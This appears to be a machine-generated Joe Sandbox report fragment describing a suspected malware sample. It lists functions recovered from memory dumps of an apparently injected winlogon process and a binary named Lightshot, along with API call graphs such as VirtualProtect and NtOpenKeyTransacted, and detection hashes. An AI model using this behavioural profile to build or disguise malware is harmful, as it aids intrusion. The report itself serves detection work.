                                                                          • Instruction ID: 5afbde93f76065e937d33a33ecda40d7cc0652e0afb463397a4e63f594b95558
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: B751B932629280CEEB55CF15E445BDCB799FB48BD9F508076DE0A63788EFB4D8418704
                                                                          Function 000001E858958405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: bfd78980145a28763c880af9517e8ac90edd43b032dea0cdb72a4fbda65ea15a
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 4A51AC32621680CAEB14CF15E445BDEB799FF54B9AF508176DE4E63788EF34D8428B04
                                                                          Function 000001E8589B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: a63bd806f66d012ce775473c1f40d5f64a693a31238674c758956550f9c12806
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: F0318832225680DAEB159F11E849BDDBBA9FB48BD9F458036AE5E13788DF38C940C704
                                                                          Function 000001E8589583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 56d3e007963a7e7881fb8535ced7d73073085fdb1eb8715deed5cad551f2bc8b
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: AD317C32221680D6EB14DF12E8457DEB7A4FF40B9AF958026EE5E17784DF38D941C704
                                                                          Function 000001E858992058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 5158255b9f45075a47059d5597f2be23213eaa00bc29a0f5feecf0f9424b8990
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 6BD1AE32B24AC0C9E711CFA9D4402ECBBB6FB54B98F144226DE6E97B99DE34C516C740
                                                                          Function 000001E8589814A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 87d0c39c7ef690860e2d692a8e2b1ea7438f5f62204bc229bf9756ed41ae7668
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: FA014832620AD0C6E715EFA6E90418EB7A2FB88FC1F044436EE4E43729EE38C051C740
                                                                          Function 000001E858992980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: 12399152d6f5684d12032a5c33f3ea79e7a8066ea1a4d7d76d6e965cdc9918e8
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: DD91AD327206D0C5F7609FA9D8803EDFBA6BB45B98F14412BDE2E67A95DE34C486C700
                                                                          Function 000001E85898253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: dc5de42c1dc400c54a34142e8686c4d9b9fee3a7d214c8df3c00669743a542fc
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 357190362207C2CAE7259EA6E8443EEF795FB89B84F440037DD0E53B89DE35D6458B00
                                                                          Function 000001E8589B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 479c25fd653139756ea47a74aec904b6b413ad4f2ed2086552f17bedce541712
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: EC614632A29B84CAEB20DF65D4403DDB7A0FB49B99F144226EE4D17B98EF38D595C700
                                                                          Function 000001E858959E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 094ec712c1b288e37f31cb4837e425075fcca7128a69f700356e5ae3858f6197
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: A1612632A25B84CAEB20DF65E4403DDB7A0FB45B89F144226EE4D17B99DF38D595CB00
                                                                          Function 000001E858982330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: 414b1109d79ba0e870cecf76c2af5f31b5d4bde43533dd6e83f510ec87595dfc
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 6951BD322287C2C1F664DAAAE4983EEF791FB95780F450137DE5E03B99DE39C9048B50
                                                                          Function 000001E8589926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: dcdd8cd598e05c42887886c746ddf0c279423bf44c0c1bf9e557dc900a05699c
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 2A416072625A80C6EB209F65E4443EDF7A2FB98794F514032EE4E87794EF38C441C740
                                                                          Function 000001E8589894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: 449c3b8d4a9707330a2244a19cbde2a29dd6a88ab94e040f38e9f4c0bfe6f638
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 5F110A36224B8182EB618F25F44439DB7E5FB88B94F584226EE8D47B69DF3CC551CB00
                                                                          Function 000001E8589B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 0e26cef9ba68d931c57e211af9cd086a3cc8b9350f618ba4ce6d2e1c4988f689
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 2AE08671650B84D4DF018F21E8802DC73A4EF58B64B8891339D5C06311FE38D1E9C300
                                                                          Function 000001E858957356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: b226c5ef1287e80dd1a639188cd00b7be9ee93c87761d6bca3fa593d7edb1d27
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 32E04F61660B84D0DB058F22E8412D873A09F58B64F8891229D5C06311EE38D1E9C300
                                                                          Function 000001E8589B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: ebbb92f6b71bc6aeecd0247755a998ea3fb1c1d57f03a5a9e81a6553625eb14e
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                          Function 000001E8589573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                          Function 000001E858981BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                          Function 000001E858981268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

                                                                          Execution Graph

                                                                          Execution Coverage:5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:172
                                                                          Total number of Limit Nodes:3
                                                                          execution_graph 1342 7ff7b1c8146d 1343 7ff7b1c81394 2 API calls 1342->1343 1197 7ff7b1c865ec 1198 7ff7b1c865f9 1197->1198 1199 7ff7b1c866e6 wcslen 1197->1199 1198->1199 1246 7ff7b1c8153f 1199->1246 1250 7ff7b1c81394 1246->1250 1248 7ff7b1c8154e 1249 7ff7b1c81394 2 API calls 1248->1249 1251 7ff7b1c89a50 malloc 1250->1251 1252 7ff7b1c813b8 1251->1252 1253 7ff7b1c813c6 NtOpenKeyTransacted 1252->1253 1253->1248 1305 7ff7b1c81ab3 1306 7ff7b1c8199e 1305->1306 1306->1305 1307 7ff7b1c81b36 1306->1307 1308 7ff7b1c81a0f 1306->1308 1310 7ff7b1c819e9 VirtualProtect 1306->1310 1309 7ff7b1c81ba0 4 API calls 1307->1309 1309->1308 1310->1306 1346 7ff7b1c81a70 1348 7ff7b1c8199e 1346->1348 1347 7ff7b1c819e9 VirtualProtect 1347->1346 1347->1348 1348->1346 1348->1347 1349 7ff7b1c81b36 1348->1349 1351 7ff7b1c81a0f 1348->1351 1350 7ff7b1c81ba0 4 API calls 1349->1350 1350->1351 1352 7ff7b1c8216f 1353 7ff7b1c82178 InitializeCriticalSection 1352->1353 1354 7ff7b1c82185 1352->1354 1353->1354 1311 7ff7b1c8219e 1312 7ff7b1c821ab EnterCriticalSection 1311->1312 1313 7ff7b1c82272 1311->1313 1314 7ff7b1c82265 LeaveCriticalSection 1312->1314 1316 7ff7b1c821c8 1312->1316 1314->1313 1315 7ff7b1c821e9 TlsGetValue GetLastError 1315->1316 1316->1314 1316->1315 1154 7ff7b1c811d8 1155 7ff7b1c811fa 1154->1155 1156 7ff7b1c8121a 1155->1156 1157 7ff7b1c81201 _initterm 1155->1157 1167 7ff7b1c81880 1156->1167 1157->1156 1159 7ff7b1c81247 SetUnhandledExceptionFilter 1160 7ff7b1c8126a 1159->1160 1161 7ff7b1c8126f malloc 1160->1161 1162 7ff7b1c8128b 1161->1162 1163 7ff7b1c812a0 strlen malloc memcpy 1162->1163 1163->1163 1164 7ff7b1c812d0 1163->1164 1165 7ff7b1c8132d _cexit 1164->1165 1166 7ff7b1c81338 1164->1166 1165->1166 1168 7ff7b1c818a2 1167->1168 1173 7ff7b1c81a0f 1167->1173 1169 7ff7b1c81956 1168->1169 1172 7ff7b1c8199e 1168->1172 1168->1173 1169->1172 1177 7ff7b1c81ba0 1169->1177 1171 7ff7b1c819e9 VirtualProtect 1171->1172 1172->1171 1172->1173 1174 7ff7b1c81b36 1172->1174 1173->1159 1175 7ff7b1c81ba0 4 API calls 1174->1175 1176 7ff7b1c81b53 1175->1176 1176->1173 1179 7ff7b1c81bc2 1177->1179 1180 7ff7b1c81c45 VirtualQuery 1179->1180 1181 7ff7b1c81cf4 1179->1181 1184 7ff7b1c81c04 memcpy 1179->1184 1180->1181 1186 7ff7b1c81c72 1180->1186 1182 7ff7b1c81d23 GetLastError 1181->1182 1183 7ff7b1c81d37 1182->1183 1184->1169 1185 7ff7b1c81ca4 VirtualProtect 1185->1182 1185->1184 1186->1184 1186->1185 1355 7ff7b1c81e65 1356 7ff7b1c81e67 signal 1355->1356 1357 7ff7b1c81e7c 1356->1357 1359 7ff7b1c81e99 1356->1359 1358 7ff7b1c81e82 signal 1357->1358 1357->1359 1358->1359 1260 7ff7b1c815e4 1261 7ff7b1c81394 2 API calls 1260->1261 1262 7ff7b1c815f3 1261->1262 1263 7ff7b1c838e0 wcslen 1271 7ff7b1c8157b 1263->1271 1272 7ff7b1c81394 2 API calls 1271->1272 1383 7ff7b1c82320 strlen 1384 7ff7b1c82337 1383->1384 1360 7ff7b1c8118b 1361 7ff7b1c811b9 _amsg_exit 1360->1361 1362 7ff7b1c81190 1360->1362 1365 7ff7b1c811fa 1361->1365 1362->1361 1364 7ff7b1c811a0 Sleep 1362->1364 1364->1361 1364->1362 1366 7ff7b1c8121a 1365->1366 1367 7ff7b1c81201 _initterm 1365->1367 1368 7ff7b1c81880 5 API calls 1366->1368 1367->1366 1369 7ff7b1c81247 SetUnhandledExceptionFilter 1368->1369 1370 7ff7b1c8126a 1369->1370 1371 7ff7b1c8126f malloc 1370->1371 1372 7ff7b1c8128b 1371->1372 1373 7ff7b1c812a0 strlen malloc memcpy 1372->1373 1373->1373 1374 7ff7b1c812d0 1373->1374 1375 7ff7b1c8132d _cexit 1374->1375 1376 7ff7b1c81338 1374->1376 1375->1376 1385 7ff7b1c81f47 1386 7ff7b1c81e67 signal 1385->1386 1389 7ff7b1c81e99 1385->1389 1387 7ff7b1c81e7c 1386->1387 1386->1389 1388 7ff7b1c81e82 signal 1387->1388 1387->1389 1388->1389 1187 7ff7b1c81394 1191 7ff7b1c89a50 1187->1191 1189 7ff7b1c813b8 1190 7ff7b1c813c6 NtOpenKeyTransacted 1189->1190 1192 7ff7b1c89a6e 1191->1192 1194 7ff7b1c89a9b 1191->1194 1192->1189 1193 7ff7b1c89b5f malloc 1196 7ff7b1c89b80 1193->1196 1194->1192 1195 7ff7b1c89b43 1194->1195 1195->1193 1196->1192 1390 7ff7b1c83352 1391 7ff7b1c833b7 1390->1391 1392 7ff7b1c83579 1391->1392 1395 7ff7b1c83493 wcscpy wcscat wcslen 1391->1395 1405 7ff7b1c8145e 1391->1405 1393 7ff7b1c8362b wcscpy wcscat wcslen 1392->1393 1394 7ff7b1c81422 2 API calls 1393->1394 1397 7ff7b1c83728 1394->1397 1403 7ff7b1c81422 1395->1403 1398 7ff7b1c83767 1397->1398 1407 7ff7b1c81431 1397->1407 1404 7ff7b1c81394 2 API calls 1403->1404 1406 7ff7b1c81394 2 API calls 1405->1406 1408 7ff7b1c81394 2 API calls 1407->1408 1273 7ff7b1c81e10 1274 7ff7b1c81e2f 1273->1274 1275 7ff7b1c81eb5 1274->1275 1276 7ff7b1c81ecc 1274->1276 1279 7ff7b1c81e55 1274->1279 1276->1275 1277 7ff7b1c81ed3 signal 1276->1277 1277->1275 1278 7ff7b1c81ee4 1277->1278 1278->1275 1280 7ff7b1c81eea signal 1278->1280 1279->1275 1281 7ff7b1c81f12 signal 1279->1281 1280->1275 1281->1275 1325 7ff7b1c81fd0 1326 7ff7b1c82033 1325->1326 1327 7ff7b1c81fe4 1325->1327 1327->1326 1328 7ff7b1c81ffd EnterCriticalSection LeaveCriticalSection 1327->1328 1328->1326 1409 7ff7b1c82050 1410 7ff7b1c8205e EnterCriticalSection 1409->1410 1411 7ff7b1c820cf 1409->1411 1412 7ff7b1c820c2 LeaveCriticalSection 1410->1412 1413 7ff7b1c82079 1410->1413 1412->1411 1413->1412 1414 7ff7b1c8653c 1417 7ff7b1c82df0 1414->1417 1418 7ff7b1c82e00 1417->1418 1427 7ff7b1c82690 1418->1427 1462 7ff7b1c8155d 1427->1462 1463 7ff7b1c81394 2 API calls 1462->1463 1282 7ff7b1c82104 1283 7ff7b1c82218 1282->1283 1284 7ff7b1c82111 EnterCriticalSection 1282->1284 1285 7ff7b1c82272 1283->1285 1287 7ff7b1c82241 DeleteCriticalSection 1283->1287 1286 7ff7b1c8220b LeaveCriticalSection 1284->1286 1289 7ff7b1c8212e 1284->1289 1286->1283 1287->1285 1288 7ff7b1c8214d TlsGetValue GetLastError 1288->1289 1289->1286 1289->1288 1290 7ff7b1c81404 1291 7ff7b1c81394 2 API calls 1290->1291 1292 7ff7b1c81413 1291->1292 1293 7ff7b1c81394 2 API calls 1292->1293 1336 7ff7b1c81ac3 1337 7ff7b1c8199e 1336->1337 1338 7ff7b1c81b36 1337->1338 1340 7ff7b1c819e9 VirtualProtect 1337->1340 1341 7ff7b1c81a0f 1337->1341 1339 7ff7b1c81ba0 4 API calls 1338->1339 1339->1341 1340->1337 1294 7ff7b1c81800 1295 7ff7b1c81812 1294->1295 1296 7ff7b1c81835 fprintf 1295->1296 1297 7ff7b1c81000 1298 7ff7b1c8108b __set_app_type 1297->1298 1299 7ff7b1c81040 1297->1299 1300 7ff7b1c810b6 1298->1300 1299->1298 1301 7ff7b1c810e5 1300->1301 1303 7ff7b1c81e00 1300->1303 1304 7ff7b1c89fe0 __setusermatherr 1303->1304

                                                                          Executed Functions

                                                                          Function 00007FF7B1C8118B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 108sleepstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 2643109117-1582277970
                                                                          • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction ID: 86f72bd26dee884ad71cbfd2be8e5f4203c41a7077a107d9fa421aa0f3e29c57
